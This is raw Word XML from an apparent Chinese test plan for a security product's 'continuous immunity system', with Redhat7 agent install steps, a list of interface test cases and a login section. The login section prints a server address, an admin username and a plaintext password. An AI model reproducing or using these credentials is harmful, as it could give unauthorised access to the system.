    <w:p w14:paraId="33EFCAFA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="1f4"/>
        <w:ind w:leftChars="514" w:left="1079" w:firstLineChars="150" w:firstLine="300"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> start blackinit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114AB01D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="258" w:name="_Toc36487915"/>
      <w:r w:rsidRPr="00536672">
        <w:t>Redhat7</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装过程：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="258"/>
    </w:p>
    <w:p w14:paraId="79531376"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 xml:space="preserve">(1)确认已经安装 wget unzip strace </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031E8849"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(2)配置文件所在的位置：/root/config-single.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455F1A15" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="550" w:firstLine="11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需要修改的配置 同上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C786EFF"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)bash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> install-agent.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63471589"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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)reboot</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="39120E00" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLineChars="500" w:firstLine="100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(5)服务启动同上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6918A4BD" w14:textId="0E0E668B" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="002A0233" w:rsidP="002A0233">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="259" w:name="_Toc36487916"/>
      <w:bookmarkStart w:id="260" w:name="_Toc36630310"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>测试</w:t>
      </w:r>
      <w:r w:rsidR="00C55A9C" w:rsidRPr="00536672">
        <w:t>用例列表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="259"/>
      <w:bookmarkEnd w:id="260"/>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728"/>
        <w:gridCol w:w="4964"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="201500D5" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="311"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A8D08D" w:themeFill="accent6" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="7174C777" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A8D08D" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28151425" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4964" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A8D08D" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BB2A948" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="7D038CA8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="317"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60CD9E67"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B42CA02"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持续免疫系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C4C7A7A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="261" w:name="_Toc517288695"/>
            <w:bookmarkStart w:id="262" w:name="_Toc502090618"/>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>持续免疫系统登录</w:t>
            </w:r>
            <w:bookmarkEnd w:id="261"/>
            <w:bookmarkEnd w:id="262"/>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="6B3C26B8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C38104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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DD54863" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A46DA9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“首页”界面</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="46C865FB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DA66191"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72F9FA46" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B03405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可信防护-防护控制测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="48737CA4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10FD2B53"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B73BA29" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01B99AC7"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可信防护-图标统计显示测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="7C3104F2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="118169D6"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CC60172" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43324FED" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>可信防护-详细日志列表显示测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="103CCB54" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F97AD8C"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78E9DAF4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E81AFA9"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可信防护-机器属性列表显示测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="6DC1E64B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0750FC55"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48ECFFCD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="471E3AC8"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可信防护-可信白名单界面列表测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="718FF82A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42ACAAB4"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="751DA51D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D542EB1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>可信防护-异常确认界面列表测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B30687B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="1f4"/>
        <w:ind w:left="1485" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>注：详细用例信息，参考持续免疫系统测试用例表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B250F06" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="002A0233">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="263" w:name="_Toc36487917"/>
      <w:bookmarkStart w:id="264" w:name="_Toc36630311"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>持续免疫系统登录信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="263"/>
      <w:bookmarkEnd w:id="264"/>
    </w:p>
    <w:p w14:paraId="67BE38F0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLineChars="282" w:firstLine="564"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>服务器地址：</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">https://192.168.1.239:8099 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079B2E46" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLineChars="282" w:firstLine="564"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>用户名：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admins</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="674AFA29" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLineChars="282" w:firstLine="564"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>密码：</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8lab_Trust714_Test</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>“首页”界面</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691"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="5FDD823E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="426BE2B7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试用例标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE56EEE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>“首页”功能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="041CFC9A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FDA5FEF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="079F44BF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PC电脑、</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome </w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>浏览器</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="586B1A23" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67134FAC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
